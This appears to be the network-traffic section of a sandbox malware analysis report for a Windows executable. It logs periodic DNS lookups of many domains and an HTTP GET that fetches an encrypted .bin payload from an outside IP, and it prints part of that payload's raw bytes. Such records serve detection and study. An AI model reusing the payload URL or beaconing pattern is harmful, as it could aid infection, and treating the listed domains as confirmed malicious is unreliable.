Mar 20, 2023 09:12:16.195895910 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.196019888 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.196072102 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.196130991 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.196203947 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.196207047 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.196284056 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.196289062 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.196379900 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.196397066 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.196475029 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.196490049 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.196557045 CET	80	49830	198.185.159.144	192.168.11.20
Mar 20, 2023 09:12:16.196587086 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.196652889 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:16.196753979 CET	49830	80	192.168.11.20	198.185.159.144
Mar 20, 2023 09:12:36.539690018 CET	49832	80	192.168.11.20	206.233.207.174
Mar 20, 2023 09:12:36.754020929 CET	80	49832	206.233.207.174	192.168.11.20
Mar 20, 2023 09:12:36.754292011 CET	49832	80	192.168.11.20	206.233.207.174
Mar 20, 2023 09:12:36.754558086 CET	49832	80	192.168.11.20	206.233.207.174
Mar 20, 2023 09:12:36.968859911 CET	80	49832	206.233.207.174	192.168.11.20
Mar 20, 2023 09:12:36.968926907 CET	80	49832	206.233.207.174	192.168.11.20
Mar 20, 2023 09:12:36.968974113 CET	80	49832	206.233.207.174	192.168.11.20
Mar 20, 2023 09:12:36.969376087 CET	49832	80	192.168.11.20	206.233.207.174
Mar 20, 2023 09:12:36.969377041 CET	49832	80	192.168.11.20	206.233.207.174
Mar 20, 2023 09:12:37.184427977 CET	80	49832	206.233.207.174	192.168.11.20
Mar 20, 2023 09:12:57.155400038 CET	49834	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:12:57.158513069 CET	80	49834	217.26.48.101	192.168.11.20
Mar 20, 2023 09:12:57.158791065 CET	49834	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:12:57.159063101 CET	49834	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:12:57.203480005 CET	80	49834	217.26.48.101	192.168.11.20
Mar 20, 2023 09:12:57.664081097 CET	49834	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:12:57.667337894 CET	80	49834	217.26.48.101	192.168.11.20
Mar 20, 2023 09:12:57.667603016 CET	80	49834	217.26.48.101	192.168.11.20
Mar 20, 2023 09:12:57.667658091 CET	80	49834	217.26.48.101	192.168.11.20
Mar 20, 2023 09:12:57.668020964 CET	49834	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:12:57.668020964 CET	49834	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:13:17.830805063 CET	49835	80	192.168.11.20	165.160.15.20
Mar 20, 2023 09:13:17.988236904 CET	80	49835	165.160.15.20	192.168.11.20
Mar 20, 2023 09:13:17.988492966 CET	49835	80	192.168.11.20	165.160.15.20
Mar 20, 2023 09:13:17.988586903 CET	49835	80	192.168.11.20	165.160.15.20
Mar 20, 2023 09:13:18.145999908 CET	80	49835	165.160.15.20	192.168.11.20
Mar 20, 2023 09:13:18.179918051 CET	80	49835	165.160.15.20	192.168.11.20
Mar 20, 2023 09:13:18.179997921 CET	80	49835	165.160.15.20	192.168.11.20
Mar 20, 2023 09:13:18.180460930 CET	49835	80	192.168.11.20	165.160.15.20
Mar 20, 2023 09:13:18.180460930 CET	49835	80	192.168.11.20	165.160.15.20
Mar 20, 2023 09:13:18.338046074 CET	80	49835	165.160.15.20	192.168.11.20
Mar 20, 2023 09:14:39.533677101 CET	49840	80	192.168.11.20	13.248.157.32
Mar 20, 2023 09:14:39.544917107 CET	80	49840	13.248.157.32	192.168.11.20
Mar 20, 2023 09:14:39.545135021 CET	49840	80	192.168.11.20	13.248.157.32
Mar 20, 2023 09:14:39.545243025 CET	49840	80	192.168.11.20	13.248.157.32
Mar 20, 2023 09:14:39.556372881 CET	80	49840	13.248.157.32	192.168.11.20
Mar 20, 2023 09:14:39.726479053 CET	80	49840	13.248.157.32	192.168.11.20
Mar 20, 2023 09:14:39.726545095 CET	80	49840	13.248.157.32	192.168.11.20
Mar 20, 2023 09:14:39.726835012 CET	49840	80	192.168.11.20	13.248.157.32
Mar 20, 2023 09:14:39.726835012 CET	49840	80	192.168.11.20	13.248.157.32
Mar 20, 2023 09:14:39.737950087 CET	80	49840	13.248.157.32	192.168.11.20
Mar 20, 2023 09:15:00.033792019 CET	49842	80	192.168.11.20	104.21.39.114
Mar 20, 2023 09:15:00.043237925 CET	80	49842	104.21.39.114	192.168.11.20
Mar 20, 2023 09:15:00.044219017 CET	49842	80	192.168.11.20	104.21.39.114
Mar 20, 2023 09:15:00.044343948 CET	49842	80	192.168.11.20	104.21.39.114
Mar 20, 2023 09:15:00.053708076 CET	80	49842	104.21.39.114	192.168.11.20
Mar 20, 2023 09:15:00.065488100 CET	80	49842	104.21.39.114	192.168.11.20
Mar 20, 2023 09:15:00.065567970 CET	80	49842	104.21.39.114	192.168.11.20
Mar 20, 2023 09:15:00.065978050 CET	49842	80	192.168.11.20	104.21.39.114
Mar 20, 2023 09:15:00.065978050 CET	49842	80	192.168.11.20	104.21.39.114
Mar 20, 2023 09:15:00.075419903 CET	80	49842	104.21.39.114	192.168.11.20
Mar 20, 2023 09:15:32.886594057 CET	49844	80	192.168.11.20	169.60.232.139
Mar 20, 2023 09:15:33.016554117 CET	80	49844	169.60.232.139	192.168.11.20
Mar 20, 2023 09:15:33.016748905 CET	49844	80	192.168.11.20	169.60.232.139
Mar 20, 2023 09:15:33.016840935 CET	49844	80	192.168.11.20	169.60.232.139
Mar 20, 2023 09:15:33.146559954 CET	80	49844	169.60.232.139	192.168.11.20
Mar 20, 2023 09:15:33.147830009 CET	80	49844	169.60.232.139	192.168.11.20
Mar 20, 2023 09:15:33.147891045 CET	80	49844	169.60.232.139	192.168.11.20
Mar 20, 2023 09:15:33.148176908 CET	49844	80	192.168.11.20	169.60.232.139
Mar 20, 2023 09:15:33.148178101 CET	49844	80	192.168.11.20	169.60.232.139
Mar 20, 2023 09:15:33.278325081 CET	80	49844	169.60.232.139	192.168.11.20
Mar 20, 2023 09:15:35.176496029 CET	49845	80	192.168.11.20	34.102.136.180
Mar 20, 2023 09:15:35.185429096 CET	80	49845	34.102.136.180	192.168.11.20
Mar 20, 2023 09:15:35.185657024 CET	49845	80	192.168.11.20	34.102.136.180
Mar 20, 2023 09:15:35.185719013 CET	49845	80	192.168.11.20	34.102.136.180
Mar 20, 2023 09:15:35.194681883 CET	80	49845	34.102.136.180	192.168.11.20
Mar 20, 2023 09:15:35.358359098 CET	80	49845	34.102.136.180	192.168.11.20
Mar 20, 2023 09:15:35.358445883 CET	80	49845	34.102.136.180	192.168.11.20
Mar 20, 2023 09:15:35.358925104 CET	49845	80	192.168.11.20	34.102.136.180
Mar 20, 2023 09:15:35.367991924 CET	80	49845	34.102.136.180	192.168.11.20
Mar 20, 2023 09:15:55.981224060 CET	49846	80	192.168.11.20	183.181.96.18
Mar 20, 2023 09:15:56.255711079 CET	80	49846	183.181.96.18	192.168.11.20
Mar 20, 2023 09:15:56.255989075 CET	49846	80	192.168.11.20	183.181.96.18
Mar 20, 2023 09:15:56.256052971 CET	49846	80	192.168.11.20	183.181.96.18
Mar 20, 2023 09:15:56.530625105 CET	80	49846	183.181.96.18	192.168.11.20
Mar 20, 2023 09:15:56.532022953 CET	80	49846	183.181.96.18	192.168.11.20
Mar 20, 2023 09:15:56.532058954 CET	80	49846	183.181.96.18	192.168.11.20
Mar 20, 2023 09:15:56.532084942 CET	80	49846	183.181.96.18	192.168.11.20
Mar 20, 2023 09:15:56.532414913 CET	49846	80	192.168.11.20	183.181.96.18
Mar 20, 2023 09:15:56.532414913 CET	49846	80	192.168.11.20	183.181.96.18
Mar 20, 2023 09:16:16.679327965 CET	49849	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:16:16.682960033 CET	80	49849	217.26.48.101	192.168.11.20
Mar 20, 2023 09:16:16.683178902 CET	49849	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:16:16.683263063 CET	49849	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:16:16.727207899 CET	80	49849	217.26.48.101	192.168.11.20
Mar 20, 2023 09:16:17.194149017 CET	49849	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:16:17.197698116 CET	80	49849	217.26.48.101	192.168.11.20
Mar 20, 2023 09:16:17.198052883 CET	80	49849	217.26.48.101	192.168.11.20
Mar 20, 2023 09:16:17.198124886 CET	80	49849	217.26.48.101	192.168.11.20
Mar 20, 2023 09:16:17.198297977 CET	49849	80	192.168.11.20	217.26.48.101
Mar 20, 2023 09:16:17.198298931 CET	49849	80	192.168.11.20	217.26.48.101

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 09:08:23.342824936 CET	61078	53	192.168.11.20	9.9.9.9
Mar 20, 2023 09:08:23.391607046 CET	53	61078	9.9.9.9	192.168.11.20
Mar 20, 2023 09:09:54.924993038 CET	55152	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:09:55.175930977 CET	53	55152	1.1.1.1	192.168.11.20
Mar 20, 2023 09:10:13.575550079 CET	51847	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:10:13.629487038 CET	53	51847	1.1.1.1	192.168.11.20
Mar 20, 2023 09:10:33.993092060 CET	63398	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:10:34.015582085 CET	53	63398	1.1.1.1	192.168.11.20
Mar 20, 2023 09:10:54.194255114 CET	51926	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:10:54.252357006 CET	53	51926	1.1.1.1	192.168.11.20
Mar 20, 2023 09:11:14.422035933 CET	65472	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:11:14.789616108 CET	53	65472	1.1.1.1	192.168.11.20
Mar 20, 2023 09:11:14.790040970 CET	65472	53	192.168.11.20	9.9.9.9
Mar 20, 2023 09:11:15.178378105 CET	53	65472	9.9.9.9	192.168.11.20
Mar 20, 2023 09:11:35.339004993 CET	61823	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:11:35.402036905 CET	53	61823	1.1.1.1	192.168.11.20
Mar 20, 2023 09:11:55.584259987 CET	54486	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:11:55.599153996 CET	53	54486	1.1.1.1	192.168.11.20
Mar 20, 2023 09:12:15.752722979 CET	51749	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:12:15.800843000 CET	53	51749	1.1.1.1	192.168.11.20
Mar 20, 2023 09:12:36.216002941 CET	55453	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:12:36.538785934 CET	53	55453	1.1.1.1	192.168.11.20
Mar 20, 2023 09:12:57.117762089 CET	60861	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:12:57.154711008 CET	53	60861	1.1.1.1	192.168.11.20
Mar 20, 2023 09:13:17.816112995 CET	51176	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:13:17.829958916 CET	53	51176	1.1.1.1	192.168.11.20
Mar 20, 2023 09:13:38.327482939 CET	64989	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:13:38.744119883 CET	53	64989	1.1.1.1	192.168.11.20
Mar 20, 2023 09:13:38.744478941 CET	64989	53	192.168.11.20	9.9.9.9
Mar 20, 2023 09:13:39.748574018 CET	64989	53	192.168.11.20	9.9.9.9
Mar 20, 2023 09:13:41.763811111 CET	64989	53	192.168.11.20	9.9.9.9
Mar 20, 2023 09:13:42.112545967 CET	53	64989	9.9.9.9	192.168.11.20
Mar 20, 2023 09:13:42.521053076 CET	53	64989	9.9.9.9	192.168.11.20
Mar 20, 2023 09:13:44.021675110 CET	53	64989	9.9.9.9	192.168.11.20
Mar 20, 2023 09:13:58.229331970 CET	57459	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:13:59.215681076 CET	53	57459	1.1.1.1	192.168.11.20
Mar 20, 2023 09:14:39.517093897 CET	55398	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:14:39.532558918 CET	53	55398	1.1.1.1	192.168.11.20
Mar 20, 2023 09:14:59.906671047 CET	61744	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:15:00.032583952 CET	53	61744	1.1.1.1	192.168.11.20
Mar 20, 2023 09:15:32.548209906 CET	58281	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:15:32.885806084 CET	53	58281	1.1.1.1	192.168.11.20
Mar 20, 2023 09:15:35.157414913 CET	56934	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:15:35.175795078 CET	53	56934	1.1.1.1	192.168.11.20
Mar 20, 2023 09:15:55.495990992 CET	60148	53	192.168.11.20	1.1.1.1
Mar 20, 2023 09:15:55.980588913 CET	53	60148	1.1.1.1	192.168.11.20
Mar 20, 2023 09:16:37.346389055 CET	53417	53	192.168.11.20	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 20, 2023 09:08:23.342824936 CET	192.168.11.20	9.9.9.9	0x5d5e	Standard query (0)	97.97.242.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Mar 20, 2023 09:09:54.924993038 CET	192.168.11.20	1.1.1.1	0x11ac	Standard query (0)	www.paparazirestaurant.co.uk	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:10:13.575550079 CET	192.168.11.20	1.1.1.1	0x8943	Standard query (0)	www.eliteequinewellness.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:10:33.993092060 CET	192.168.11.20	1.1.1.1	0x421c	Standard query (0)	www.economjchq.space	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:10:54.194255114 CET	192.168.11.20	1.1.1.1	0xa29e	Standard query (0)	www.friendsofquarepianos.co.uk	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:11:14.422035933 CET	192.168.11.20	1.1.1.1	0xb1a8	Standard query (0)	www.goverifyvin.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:11:14.790040970 CET	192.168.11.20	9.9.9.9	0xb1a8	Standard query (0)	www.goverifyvin.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:11:35.339004993 CET	192.168.11.20	1.1.1.1	0x4097	Standard query (0)	www.arialttnr.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:11:55.584259987 CET	192.168.11.20	1.1.1.1	0x7a1	Standard query (0)	www.eeccu.info	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:15.752722979 CET	192.168.11.20	1.1.1.1	0xe5d7	Standard query (0)	www.garageautosaintthomas.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:36.216002941 CET	192.168.11.20	1.1.1.1	0xa35d	Standard query (0)	www.hospitalityhsia.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:57.117762089 CET	192.168.11.20	1.1.1.1	0xc5dd	Standard query (0)	www.abimpianti.ch	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:17.816112995 CET	192.168.11.20	1.1.1.1	0x7d8	Standard query (0)	www.drugtestingservices.co.uk	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:38.327482939 CET	192.168.11.20	1.1.1.1	0xa63c	Standard query (0)	www.thinkdev.africa	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:38.744478941 CET	192.168.11.20	9.9.9.9	0xa63c	Standard query (0)	www.thinkdev.africa	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:39.748574018 CET	192.168.11.20	9.9.9.9	0xa63c	Standard query (0)	www.thinkdev.africa	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:41.763811111 CET	192.168.11.20	9.9.9.9	0xa63c	Standard query (0)	www.thinkdev.africa	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:58.229331970 CET	192.168.11.20	1.1.1.1	0x8fe7	Standard query (0)	www.top-promotion.net	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:14:39.517093897 CET	192.168.11.20	1.1.1.1	0x68aa	Standard query (0)	www.amyjohnsonrealtor.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:14:59.906671047 CET	192.168.11.20	1.1.1.1	0x3f09	Standard query (0)	www.lists-cellphones.life	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:32.548209906 CET	192.168.11.20	1.1.1.1	0xed83	Standard query (0)	www.findyellowfreightjobs.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:35.157414913 CET	192.168.11.20	1.1.1.1	0xc133	Standard query (0)	www.conscienciaretroprogresiva.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:55.495990992 CET	192.168.11.20	1.1.1.1	0xcbb2	Standard query (0)	www.triknblog.net	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:16:37.346389055 CET	192.168.11.20	1.1.1.1	0x67eb	Standard query (0)	www.laposadaapts.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 20, 2023 09:08:23.391607046 CET	9.9.9.9	192.168.11.20	0x5d5e	Name error (3)	97.97.242.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Mar 20, 2023 09:09:55.175930977 CET	1.1.1.1	192.168.11.20	0x11ac	No error (0)	www.paparazirestaurant.co.uk		192.187.111.221	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:10:13.629487038 CET	1.1.1.1	192.168.11.20	0x8943	No error (0)	www.eliteequinewellness.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:10:13.629487038 CET	1.1.1.1	192.168.11.20	0x8943	No error (0)	ghs.googlehosted.com		142.250.185.211	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:10:34.015582085 CET	1.1.1.1	192.168.11.20	0x421c	No error (0)	www.economjchq.space		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:10:34.015582085 CET	1.1.1.1	192.168.11.20	0x421c	No error (0)	www.economjchq.space		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:10:54.252357006 CET	1.1.1.1	192.168.11.20	0xa29e	No error (0)	www.friendsofquarepianos.co.uk		81.17.29.147	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:11:14.789616108 CET	1.1.1.1	192.168.11.20	0xb1a8	Server failure (2)	www.goverifyvin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:11:15.178378105 CET	9.9.9.9	192.168.11.20	0xb1a8	Server failure (2)	www.goverifyvin.com	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:11:35.402036905 CET	1.1.1.1	192.168.11.20	0x4097	No error (0)	www.arialttnr.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:11:35.402036905 CET	1.1.1.1	192.168.11.20	0x4097	No error (0)	ghs.googlehosted.com		142.250.186.51	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:11:55.599153996 CET	1.1.1.1	192.168.11.20	0x7a1	Name error (3)	www.eeccu.info	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:15.800843000 CET	1.1.1.1	192.168.11.20	0xe5d7	No error (0)	www.garageautosaintthomas.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:12:15.800843000 CET	1.1.1.1	192.168.11.20	0xe5d7	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:15.800843000 CET	1.1.1.1	192.168.11.20	0xe5d7	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:15.800843000 CET	1.1.1.1	192.168.11.20	0xe5d7	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:15.800843000 CET	1.1.1.1	192.168.11.20	0xe5d7	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:36.538785934 CET	1.1.1.1	192.168.11.20	0xa35d	No error (0)	www.hospitalityhsia.com		206.233.207.174	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:12:57.154711008 CET	1.1.1.1	192.168.11.20	0xc5dd	No error (0)	www.abimpianti.ch		217.26.48.101	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:17.829958916 CET	1.1.1.1	192.168.11.20	0x7d8	No error (0)	www.drugtestingservices.co.uk		165.160.15.20	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:17.829958916 CET	1.1.1.1	192.168.11.20	0x7d8	No error (0)	www.drugtestingservices.co.uk		165.160.13.20	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:38.744119883 CET	1.1.1.1	192.168.11.20	0xa63c	Server failure (2)	www.thinkdev.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:42.112545967 CET	9.9.9.9	192.168.11.20	0xa63c	Server failure (2)	www.thinkdev.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:42.521053076 CET	9.9.9.9	192.168.11.20	0xa63c	Server failure (2)	www.thinkdev.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:44.021675110 CET	9.9.9.9	192.168.11.20	0xa63c	Server failure (2)	www.thinkdev.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:59.215681076 CET	1.1.1.1	192.168.11.20	0x8fe7	Name error (3)	www.top-promotion.net	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:14:39.532558918 CET	1.1.1.1	192.168.11.20	0x68aa	No error (0)	www.amyjohnsonrealtor.com	amyjohnsonrealtor.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:14:39.532558918 CET	1.1.1.1	192.168.11.20	0x68aa	No error (0)	amyjohnsonrealtor.com		13.248.157.32	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:00.032583952 CET	1.1.1.1	192.168.11.20	0x3f09	No error (0)	www.lists-cellphones.life		104.21.39.114	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:00.032583952 CET	1.1.1.1	192.168.11.20	0x3f09	No error (0)	www.lists-cellphones.life		172.67.144.224	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:32.885806084 CET	1.1.1.1	192.168.11.20	0xed83	No error (0)	www.findyellowfreightjobs.com		169.60.232.139	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:32.885806084 CET	1.1.1.1	192.168.11.20	0xed83	No error (0)	www.findyellowfreightjobs.com		169.60.232.138	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:35.175795078 CET	1.1.1.1	192.168.11.20	0xc133	No error (0)	www.conscienciaretroprogresiva.com	conscienciaretroprogresiva.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:15:35.175795078 CET	1.1.1.1	192.168.11.20	0xc133	No error (0)	conscienciaretroprogresiva.com		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:15:55.980588913 CET	1.1.1.1	192.168.11.20	0xcbb2	No error (0)	www.triknblog.net		183.181.96.18	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:16:37.623399973 CET	1.1.1.1	192.168.11.20	0x67eb	No error (0)	www.laposadaapts.com	www-laposadaapts-com.rentcafecn.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:16:37.623399973 CET	1.1.1.1	192.168.11.20	0x67eb	No error (0)	www-laposadaapts-com.rentcafecn.com	www.rentcafecloudflarecn.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:16:37.623399973 CET	1.1.1.1	192.168.11.20	0x67eb	No error (0)	www.rentcafecloudflarecn.com	www.rentcafecloudflarecn.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

195.133.40.46

www.paparazirestaurant.co.uk

www.eliteequinewellness.com

www.economjchq.space

www.friendsofquarepianos.co.uk

www.arialttnr.com

www.garageautosaintthomas.com

www.hospitalityhsia.com

www.abimpianti.ch

www.drugtestingservices.co.uk

www.amyjohnsonrealtor.com

www.lists-cellphones.life

www.findyellowfreightjobs.com

www.conscienciaretroprogresiva.com

www.triknblog.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49810	195.133.40.46	80	C:\Users\user\Desktop\SC.028UCCP.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:09:13.434535027 CET	108	OUT	GET /CsPlxqjFa224.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 195.133.40.46 Cache-Control: no-cache
Mar 20, 2023 09:09:13.461829901 CET	109	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Fri, 17 Mar 2023 01:56:34 GMT Accept-Ranges: bytes ETag: "5f2f8cb37358d91:0" Server: Microsoft-IIS/10.0 Date: Mon, 20 Mar 2023 08:09:13 GMT Content-Length: 190016 Data Raw: 78 82 6a a3 76 07 eb 5b eb 3a ac ab 88 ea 63 aa bd 57 c0 6f 32 58 87 b2 e4 61 57 77 66 7e 63 d1 28 de 69 e0 1f a9 b8 23 c3 98 34 a7 37 71 7b 07 c1 9f 48 83 96 d8 b8 e4 e4 8f 48 0e 10 fa ad ca 3d c3 66 e9 8d 60 2c d4 44 92 bf 78 23 60 3e d3 16 5d 58 f7 09 cd 8d 3e 6d d7 0b f5 ef 8e 87 4a ef a1 7d 30 f2 e8 c8 6b 48 16 da 93 53 52 35 d0 59 50 1e 20 07 18 c2 23 27 24 4a 06 34 30 02 bc e3 57 06 29 d7 9d 90 27 73 bb f5 3d 9b 35 c7 34 29 25 95 30 a8 3f fa 72 61 fd 34 b3 37 67 f8 ab ef d1 0c c1 06 ef 1d 09 ac b4 4e cf fa 4e 20 00 bc ee 2b be 5d ce 87 07 85 87 50 8d ab d2 8a 5a e2 8c 15 cd 4d fe 41 3c 98 5a 10 d9 7f d1 1e cc ae 59 41 72 78 ed 62 d2 db 2a e7 37 5d 43 fc f4 97 af c6 4f ee 15 72 99 42 23 5d aa ea 7f 04 57 ca 75 92 9f d4 6f aa 7e 10 2c dc d6 b5 fc dc b5 9e 58 92 0f c2 6d 8c ea 87 1e 6e 88 40 bd a0 88 2b 86 7a db 80 72 bd 08 e3 11 4e 12 99 e1 da 96 96 b9 e1 05 30 7f cd bb 29 79 37 83 5f 3e 0c 88 55 e9 33 9f 16 31 69 26 51 86 44 5d 3d 2b 91 98 d1 5c 2b 65 82 db 90 86 c5 e8 46 3b 88 36 f7 7f 56 03 df 48 6f 19 e9 c3 93 d7 55 26 01 54 95 f8 d4 9f 5b 80 46 09 31 7d 37 93 b5 f5 38 4d a7 93 a0 44 f6 ad 0f f1 ae fe 23 74 41 3f 7a 0d e6 2e 76 25 0c 50 af b2 d8 d1 53 f1 0b 26 97 fe bd fc 57 07 3d 6d d0 6d 3c 0a 0f 3b 5d ea 2d 61 82 f6 f4 f5 65 31 6d 0a 12 77 6e c9 32 45 34 70 f8 46 2e 24 43 12 0d 22 f8 1a 68 f8 88 86 79 3f e8 f2 03 e6 9c 35 2a 39 a6 61 b6 d0 0b 97 8e fe 87 74 b4 83 d4 90 55 c5 44 87 56 bc 6f b0 b3 9e af e3 0b 9d 61 a8 39 7f e9 df 53 8e 22 02 d6 b6 cd 17 88 07 86 1b f6 35 36 80 1f 0f f0 7a cf 69 a0 3f 21 58 1c 5f 47 f0 ce 6c 0a 63 21 3f 04 16 d2 66 78 2d 4d 2e 0c 35 81 60 91 d2 26 bb 65 4d 59 73 33 09 81 72 d1 1f 4d e3 6e 0a 44 e2 33 84 6b e4 c1 bc 96 ff f4 38 1f 22 6e fe f0 8b 51 22 7e cc 82 7e 98 ee 4b 04 22 4a 40 e2 fe b8 91 0b af d2 f1 ce 4f e9 fc 09 e2 e6 d0 80 1d 05 3f 1e 1a 90 1c a2 18 ed 15 56 e8 d7 96 da 70 bb d1 5e fd 96 04 dd 18 e7 81 93 31 9e 13 9d e7 43 5f c6 1f c9 d2 0a da 10 82 7f 3a db 36 a0 15 59 d2 2e 51 2e 23 f8 30 14 b8 8a 67 c0 8f 51 a5 7a 95 cb c6 96 59 83 49 32 db 1c 66 61 78 5e 23 cd b3 41 07 8c fb 66 c7 46 3d 75 93 20 84 60 f9 6c f1 33 ef 11 20 5d cf 4c 72 44 14 d2 e6 c9 9b 07 45 e4 3a 66 07 ea 51 68 cd c4 03 ce ec 50 fa 77 ed f5 f4 24 d8 0a 57 44 01 fb 71 43 24 ff 71 c5 2e b1 ca 52 e5 8d b1 38 58 97 46 e8 d7 f5 2b f4 d0 8e 54 c5 3d 44 4b 61 79 0f 31 34 bb 19 e4 07 7e 57 f8 17 ec cb 8a 54 43 5e 53 fc 1a a7 1a f0 ff a5 c7 39 